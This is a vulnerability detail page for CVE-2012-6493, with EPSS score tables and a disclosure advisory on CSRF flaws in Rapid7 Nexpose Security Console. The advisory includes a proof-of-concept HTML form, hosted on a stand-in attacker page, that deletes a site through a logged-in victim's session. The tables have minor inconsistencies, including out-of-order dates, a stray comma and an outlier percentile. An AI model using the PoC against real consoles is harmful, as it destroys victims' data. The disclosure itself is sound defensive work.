CVE-2012-6493 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	8.1%	–	–
2022-04-03	–	–	8.1%	–	–
2022-07-24	–	–	7.51%	–	–
2022-11-13	–	–	7.51%	–	–
2022-11-20	–	–	7.51%	–	–
2022-12-25	–	–	7.51%	–	–
2023-01-01	–	–	7.51%	–	–
2023-02-26	–	–	7.51%	–	–
2023-03-12	–	–	–	0.82%	–
2023-07-09	–	–	–	0.82%	–
2024-02-11	–	–	–	0.82%	–
2024-04-14	–	–	–	0.82%	–
2024-06-02	–	–	–	0.82%	–
2024-08-25	–	–	–	0.78%	–
2024-12-22	–	–	–	0.73%	–
2025-03-02	–	–	–	1.01%	–
2025-01-19	–	–	–	0.73%	–
2025-03-09	–	–	–	1.01%	–
2025-03-18	–	–	–	–	0.56%
2025-04-15	–	–	–	–	0.56%
2025-07-01	–	–	–	–	0.56%
2025-07-04	–	–	–	–	0.56%
2025-07-16	–	–	–	–	0.42%
2025-09-20	–	–	–	–	0.39%
2025-09-20	–	–	–	–	0.39,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	82%
2022-04-03	93%
2022-07-24	92%
2022-11-13	93%
2022-11-20	92%
2022-12-25	93%
2023-01-01	92%
2023-02-26	93%
2023-03-12	79%
2023-07-09	8%
2024-02-11	81%
2024-04-14	82%
2024-06-02	82%
2024-08-25	82%
2024-12-22	81%
2025-03-02	84%
2025-01-19	81%
2025-03-09	84%
2025-03-18	66%
2025-04-15	67%
2025-07-01	68%
2025-07-04	67%
2025-07-16	61%
2025-09-20	59%
2025-09-20	59%

Product: Nexpose Security Console Vendor: Rapid7 Version: < 5.5.3 Tested Version: 5.5.1 Vendor Notified Date: December 19, 2012 Release Date: January 2, 2013 Risk: High Authentication: None required Remote: Yes Description: Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Nexpose Security Console 5.5.3 and below allow remote attackers to submit actions on a legitimate user’s behalf. By not properly checking each URL, an attacker can execute requests on behalf of a legitimate user. If an authenticated user is tricked into visiting a specially crafted page, it may be possible to perform user-initiated actions on the web application using the victim’s established session. Successful exploitation of this vulnerability resulted in deleting scan data and sites during the proof-of-concept. Exploit steps for proof-of-concept: 1. Create an external site/page: http://attackersite.com/nexpose-csrf.htm that contains: [code] <html> <!-- Nexpose CSRF PoC --> <body> <form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1" method="POST" enctype="multipart/form-data"> <input type="submit" value="delete site" /> </form> <script> //document.forms[0].submit(); //uncomment to auto-submit </script> </body> </html> [/code] 2. Lure victim to http://attackersite.com/nexpose-csrf.htm. 3. Site with ID 1 is deleted when form is submitted. Vendor Notified: Yes Vendor Response: Quickly escalated and resolved. Vendor Update: Remediated in 5.5.4. Reference: CVE-2012-6493 https://community.rapid7.com/docs/DOC-2065#release5 https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF) Credit: Robert Gilbert HALOCK Security Labs